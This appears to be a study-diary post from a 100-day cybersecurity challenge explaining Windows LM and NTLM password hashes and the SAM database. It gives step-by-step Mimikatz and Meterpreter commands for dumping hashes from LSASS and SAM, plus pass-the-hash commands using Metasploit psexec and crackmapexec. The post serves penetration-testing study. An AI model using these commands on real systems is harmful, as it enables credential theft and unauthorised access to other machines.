Day 22/100 of #cybertechdave100daysofcyberchallenge - Windows Password Hashes

Today we learned a little bit about Windows Password Hashes. Let's jump right in.

Which hash types are used in Windows system?

Till Windows Server 2003 -> LM and NTLM

LM (LanMan) Hash:

• Default hashing algorithm implemented in Windows OS prior to NT 4.0

Hashing process can be broken down into:

1. Password is broken down into two seven-character chunks
2. All characters are converted into uppercase
3. Each chunk is hashed with the DES algorithm

• Considered as weak protocol and easily crackable, primarily because of the absence of salts
• Brute force and rainbow table attacks are effective against

From Windows Vista on: NTLM, and LM are disabled

NTLM (NTHash) Hash:

• It is a collection of authentication protocols
• User Accounts are encrypted using the MD4 hashing

Improves upon LM in the following ways:

• Does not split the hash in to two chunks
• Case sensitive
• Allows use of symbols and unicode characters

Where are these password hashes stored on Windows?

• They are stored locally in the SAM (Security Accounts Manager) database
• The authentication and verification of user credentials is facilitated by the Local Security Authority (LSA)

This Database file is responsible for managing user accounts and passwords

• All passwords stored as hashes
• Cannot be copied while the OS is running
• Windows NT kernel keeps the SAM database file locked
• In modern Windows versions -> SAM is encrypted with a syskey

Attacks typically utilize in-memory techniques and tools to dump SAM hashes from the LSASS process (elevated privileges are required to access and interact with the LSASS process)

Now let's look how we can dump hashes with mimikatz?

Mimikatz is a Windows post-exploitation tool that allows the extraction of clear-text passwords, hashes and kerberos tickets from memory

• e.g. from the lsass.exe process
• requieres elevated privileges in order to run correctly

Again, we can use a metasploit module after obtaining a metepreter shell. Importantly, we need elevated privileges. Therefore it is important to be proficient in privilege escalation.?

First of all, migrate your meterpreter session to the lsass process. Mainly due to compatibility:

• pgrep lsass?
• migrate <process_id>

Now the process to dump the hashes:

• load the metasploit version of mimikatz -> load kiwi
• dump SAM database -> lsa_dump_sam (also dumps the sys key for the SAM database)

The manual process without metasploit goes as follows:

• upload mimikatz.exe (Either already the executable or the c code to compile it on the target)
• .\mimikatz.exe

Check appropriate privileges:

• privilege::debug -> need to be 'OK'

Dump hashes:

• lsadump::sam
• lsadump::secrets -> provides a bit more information

We now have two options to proceed. Either we try to crack the hashes with corresponding wordlists. The other possibility is the so-called pass-the-hash attack. Because we don't always need the password in plain text to be able to log on to another system.?

What do we mean by pass-the-hash attacks?

• Exploitation Technique that involves capturing/harvesting hashes and utilizing them to authenticate with the target legitimately
• as opposed to obtaining access via service exploitation

Some of the tools to perform the attack:

• Metasploit PsExec module
• Crackmapexec

Attack with metasploit psexec module:

• use exploit/windows/smb/psexec
• set options: lport, rhosts, smbuser, smbpass (as hash) and target (Native\ Upload at first) sometimes this option requires some trial and error

Attack with crackmapexec:

• crackmapexec smb <ip> -u <username> -H "<NTLM_hash>" -x "<command>"

That's it for today. :)

#cybertechdave100daysofcyberchallenge?#100daysofhacking?#penetrationtesting?#ine?#eJPTv2